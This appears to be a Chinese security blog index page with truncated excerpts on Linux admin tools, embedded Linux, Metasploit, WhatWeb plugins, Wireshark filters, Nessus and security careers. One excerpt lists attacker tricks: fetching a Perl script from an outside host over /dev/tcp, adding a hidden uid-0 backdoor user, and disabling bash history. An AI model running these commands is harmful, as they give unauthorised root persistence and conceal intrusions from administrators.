来源:51cto.com
对于Linux管理员来说,有很多非常有用的工具可供选择。在这里,我只是列举出其中5个,Linux管理员日常操作都要用到的工具。我认为,功能最强的工具可能并不适合你的使用情况,而且绝对有些工具我还忘了把它们统计进来,如果是这样的话,我恳请大家把我没收录的工具在评论中写出来。另外,本文中提到的工具仅供选择,并不是每个人都一定需要它们,而那些没提到的工具,并不是说Linux管理员就不需要使用,像SSH, SCP这样的工具,每个Linux管理员都必须使用并且没有其他选择。
#5. head/tail命令
大多数情况下,登录服务器的唯一目的是诊断某些问题,常规方法是查看日志。有各种不同应用类型的日志,比如Apache日志、MySQL日志、邮件日志等。那么你用什么命令来查看日志呢,难道不是tail吗?这其实与此类似,我们有时候可以使用“head”命令来查看一个文件的开始几行。
几个例子:
#4. vi/nano/emacs工具 阅读全文…
PC硬件使用的增加是近年来高端嵌入式系统的一个最重要的发展。由于这个趋势,嵌入式系统的硬件成本大大地下降了,然而应用于嵌入式PC平台的软件系统却没有太多的选择。
目前嵌入式操作系统主要有Palm OS,WindowsCE,EPOC,LinuxCE,QNX.ECOS,LYNX等,但这些系统一般都价格昂贵、不具有良好的可移植性。由于linux具有适应于多种CPU和多种硬件平台、性能稳定、裁剪性能好,开发和使用都很容易等特点,越来越多的人倾向于将Linux嵌入到移动计算平台、信息家电、媒体手机及其它产品中去。这同时也对Linux的实时性提出了更高的要求。
我们参加开发的上海数字技术中心的电子警察系统就是这样一个基于PC平台的嵌入式系统。它的主要功能是安装在十字路口上监视闯红灯的汽车,录制这些镜头,并适时通过网络传回总监控中心。该系统原来采用Vxworks作为运作平台,然而由于Vxworks的昂贵,且只能安装一台机器,因此将Linux改制成嵌入式的、具有一定实时性的系统平台。 阅读全文…
作者:cnbird
1.无wget nc等下载工具时下载文件
exec 5<>/dev/tcp/yese.yi.org/80 &&echo -e “GET /c.pl HTTP/1.0\n” >&5 && cat<&5 > c.pl
2.Linux添加uid为0的用户
useradd -o -u 0 cnbird
3.bash去掉history记录
export HISTSIZE=0
export HISTFILE=/dev/null 阅读全文…
PDF版下载:MSFEXP
为了方便大家手记,以下内容有PDF转化而来,如果不方便阅读或遇错,请下载PDF版本阅读!
作者:gz1x [gz1x@tom.com]
[目录]
目录………………………………………………………………………………………………………………………………..2
0.前言…………………………………………………………………………………………………………………………..3
1.概述…………………………………………………………………………………………………………………………..3
2.界面环境……………………………………………………………………………………………………………………3 阅读全文…
来源:exploit-db.com
How to develop WhatWeb 0.4 plugins
———————————-
by Andrew Horton aka urbanadventurer. MorningStar Security http://www.morningstarsecurity.com/
Revision 1.1, 29th March 2010.
Contents
=================================================
1. Introduction to WhatWeb
2. Introduction to WhatWeb plugins
General aims of a plugin
Methods to identify systems
Important files and folders
Anatomy of a plugin
3. Research background information
4. Collect samples
Website Showcases
Using Search Engines
Forums for website development with the cms 阅读全文…
一、IP过滤:包括来源IP或者目标IP等于某个IP
比如:ip.src addr==192.168.0.208 or ip.src addr eq 192.168.0.208 显示来源IP
ip.dst addr==192.168.0.208 or ip.dst addr eq 192.168.0.208 显示目标IP
二、端口过滤:
比如:tcp.port eq 80 // 不管端口是来源的还是目标的都显示
tcp.port == 80
tcp.port eq 2722
tcp.port eq 80 or udp.port eq 80
tcp.dstport == 80 // 只显tcp协议的目标端口80
tcp.srcport == 80 // 只显tcp协议的来源端口80 阅读全文…
来源:http://www.milsec.net/viewtopic.php?id=42
Topic: attack oracle with metasploit有个oracle弱口令。就能搞定目标。当然这个弱口令帐户要有resource权限。
1.查询tns版本.用nmap5也可以
首先到 http://www.tenablesecurity.com/download/ 下载所需的Nessus
如果想用图形界面Nessus的话 NessusClient也要下载 注册信息可以随意填
$sudo dpkg -i Nessus-3.2.1-debian4_i386.deb
$sudo dpkg -i NessusClient-3.2.1-debian4_i386.deb
添加用户
$sudo /opt/nessus/sbin/nessus-adduser 阅读全文…
来源:chinaunix.net
本版初稿只代表个人观点,仅供参考,对于迷信产生的后果,本人不承担任何责任
本文实际上并不能算是Career Planning,只是一些分类描述,唯一好处仅在于帮助你理解不同职位的技能要求,因为最近很忙,本文也远远达不到Body of Knowledge的详细程度,计划在空闲时再补一篇真正的Career Roadmap
[漏洞挖掘/安全技术研究员]
研究对象:OS,网络,应用,通讯媒介及协议的安全漏洞和防御方法,偏重于底层技术,对技术要求最高,但不要求很全面,只需精通一两种流行的平台即可。其研究成果经常为IDS/IPS/Vulnerability Scanner插件作分析等,最新的技术可能被转化到产品中实现商业价值,或可能承担技术最高的一部分专业安全服务。
主要技能:C\C++,ASM,OS kernel,调试器,反汇编、缓冲区溢出类,逻辑编程错误等 阅读全文…